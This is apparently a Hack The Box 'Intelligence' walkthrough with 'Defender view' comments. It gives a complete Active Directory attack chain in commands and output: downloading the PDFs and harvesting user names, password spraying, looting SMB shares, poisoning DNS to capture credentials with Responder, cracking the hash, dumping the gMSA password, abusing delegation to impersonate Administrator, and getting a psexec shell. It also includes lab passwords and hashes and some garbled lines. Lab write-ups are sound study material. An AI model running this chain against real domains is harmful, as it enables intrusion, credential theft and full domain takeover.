Foothold

#!/bin/bash
# Request every candidate 2020-MM-DD-upload.pdf under /documents/ on the lab
# host. The brace expansion yields all 12 x 31 month/day pairs in the same
# order as two nested loops (month outer, day inner); dates with no document
# simply make wget report an HTTP error and the loop moves on.
#
# Defender view: the file names are guessable from the date alone and wget
# sends no credentials, so nothing but the naming scheme protects the files.
# In web logs this shows as a burst of sequential requests from one client,
# mostly answered with errors. Access control on the directory or
# non-guessable names removes the exposure.
for stamp in 2020-{01..12}-{01..31}; do
    wget "http://10.10.10.248/documents/${stamp}-upload.pdf"
done

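# Build users.txt from the Creator metadata of the downloaded files:
# grep keeps the Creator lines, awk prints the text after the first colon
# (a value containing a further colon would be cut there), sed strips the
# leading whitespace, and sort -u removes duplicates.
#
# Defender view: author metadata left in published documents gives away
# account names; strip metadata before documents go onto a public site.
exiftool 2020-* | grep -i creator | awk -F: '{print $2}' | sed 's/^[ \t]*//' | sort -u > users.txt

# Open each downloaded file for reading. The glob is iterated directly and the
# variable is quoted, so no ls output is parsed and file names are never
# word-split; the -e test skips the literal pattern when nothing matches.
for i in 2020-*; do
    [ -e "$i" ] || continue
    open "$i"
done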
Password found while reading the PDFs: NewIntelligenceCorpUser9876
# Password spray: the one password above is tried over SMB for every name in
# users.txt, and --continue-on-success keeps testing after the first valid login.
# Defender view: a single source failing logons across many different accounts
# in a short window is the pattern to alert on. The underlying weakness is a
# shared password that is still valid on at least one account.
netexec smb 10.10.10.248 -u users.txt -p NewIntelligenceCorpUser9876 --continue-on-success
Valid login from the spray: Tiffany.Molina:NewIntelligenceCorpUser9876
# List the SMB shares this account can see; the page goes on to read the
# Users and IT shares with the same login.
# Defender view: review which shares ordinary domain users can read,
# especially any that hold operational scripts.
netexec smb 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876 --shares
adot@kali:~/oscp/htb/windows/intelligence$ smbclient "\\\\10.10.10.248\\Users" -U  Tiffany.Molina%NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sun Apr 18 20:20:26 2021
  ..                                 DR        0  Sun Apr 18 20:20:26 2021
  Administrator                       D        0  Sun Apr 18 19:18:39 2021
  All Users                       DHSrn        0  Sat Sep 15 02:21:46 2018
  Default                           DHR        0  Sun Apr 18 21:17:40 2021
  Default User                    DHSrn        0  Sat Sep 15 02:21:46 2018
  desktop.ini                       AHS      174  Sat Sep 15 02:11:27 2018
  Public                             DR        0  Sun Apr 18 19:18:39 2021
  Ted.Graves                          D        0  Sun Apr 18 20:20:26 2021
  Tiffany.Molina                      D        0  Sun Apr 18 19:51:46 2021

		3770367 blocks of size 4096. 1418574 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
$ smbclient "\\\\10.10.10.248\\IT" -U  Tiffany.Molina%NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Apr 18 19:50:55 2021
  ..                                  D        0  Sun Apr 18 19:50:55 2021
  downdetector.ps1                    A     1046  Sun Apr 18 19:50:55 2021

		3770367 blocks of size 4096. 1419262 blocks available
smb: \> mget downdetector.ps1 
Get file downdetector.ps1? y
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (5.1 KiloBytes/sec) (average 5.1 KiloBytes/sec)
smb: \> exit
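# Check web server status. Scheduled to run every 5min
#
# Review notes (defender view):
# - The host list is not fixed: it is every record in the AD-integrated
#   intelligence.htb DNS zone whose name starts with "web". Whoever can create
#   a record matching that pattern adds a host to this loop.
# - -UseDefaultCredentials lets Invoke-WebRequest authenticate to each of those
#   hosts as the account running the task, so an untrusted host on the list
#   receives that account's authentication attempt. A health check needs no
#   credentials. Prefer an explicit allow-list of hosts and drop the switch.
# - The empty catch hides every failure, including unreachable hosts, so an
#   unreachable host never produces an alert.
# - The byte-order-mark residue at the top of the listing was dropped and the
#   "$request" variable, lost from the status check in the page extract, was
#   restored from the assignment on the line before it.
Import-Module ActiveDirectory
foreach ($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        # Authenticated request to whatever host the DNS record names.
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if ($request.StatusCode -ne 200) {
            # Addresses appear as "[email protected]" because the page obfuscated them.
            Send-MailMessage -From 'Ted Graves <[email protected]>' -To 'Ted Graves <[email protected]>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}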
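Ted.Graves is the account named in the script's mail settings; presumably the scheduled task runs as this user.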
# Collect directory data (-c all) from the domain with the same user login,
# using 10.10.10.248 as the name server.
# Defender view: any authenticated user can read most of this data, so the
# useful signal is the volume of directory queries from a single workstation
# account rather than any single request.
bloodhound-python -d intelligence.htb -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -ns 10.10.10.248 -c all

Add a DNS A record (the name starts with "web" so that it matches the script's `web*` filter)

# Step 1: add an A record to the AD-integrated zone with the user login from
# earlier. The record name begins with "web", so the scheduled script will
# request it, and -d points it at 10.10.14.6.
# Defender view: AD-integrated zones let authenticated users create new records
# by default. Tighten the zone ACL and alert on records created by non-admin
# accounts.
python dnstool.py -u 'intelligence.htb\tiffany.molina' -p NewIntelligenceCorpUser9876 -r webad0t8.intelligence.htb -a add -t A -d 10.10.14.6 10.10.10.248
# Step 2: listen on tun0 for the script's authenticated HTTP request.
sudo responder -I tun0
# Step 3: hashcat mode 5600 is NetNTLMv2. ted.hash holds the captured response;
# the step that saved it is not shown on the page.
# Defender view: the password used in the next command was recovered with a
# public wordlist. Accounts that run scheduled tasks need long random passwords
# or, better, no password-based network authentication to arbitrary hosts.
hashcat -m 5600 ted.hash ~/rockyou.txt -O
# Step 4: read the managed password of any group managed service account that
# Ted.Graves is permitted to retrieve. The hash used below for svc_int$
# presumably comes from this output, which the page does not show.
# Defender view: keep the list of principals allowed to retrieve a gMSA
# password minimal and audit reads of the managed-password attribute.
python gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
# Step 5: confirm that the svc_int$ hash authenticates over SMB.
netexec smb 10.10.10.248 -u svc_int$ -H 51e4932f13712047027300f869d07ab6
# Step 6: request a service ticket in Administrator's name through svc_int$.
# This only succeeds if svc_int$ is trusted for delegation to the requested
# SPN. Two attempts with different SPNs (http/ and WWW/) are recorded; the page
# does not show which one succeeded.
# NOTE(review): "etST.py" looks like a truncated "getST.py" (confirm).
# Defender view: audit which accounts are configured for delegation and to
# which SPNs, and mark privileged accounts as sensitive / not delegable (or add
# them to Protected Users) so they cannot be impersonated this way.
impacket-getST -spn http/dc.intelligence.htb -impersonate Administrator -u intelligence/svc_int$ -hashes 51e4932f13712047027300f869d07ab6:51e4932f13712047027300f869d07ab6
etST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -hashes 51e4932f13712047027300f869d07ab6:51e4932f13712047027300f869d07ab6
# Step 7: point Kerberos-aware tools at the ticket cache saved in this directory.
export KRB5CCNAME=$(pwd)/Administrator.ccache 
# Step 8: remote execution using only the Kerberos ticket (-k -no-pass).
# "[email protected]" looks like the site's e-mail obfuscation replacing a
# user@host argument; the original value is not recoverable from this page.
# Defender view: psexec-style tools install a service on the target, so new
# service creation on a domain controller is a high-value alert.
impacket-psexec -k -no-pass intelligence.htb/[email protected]
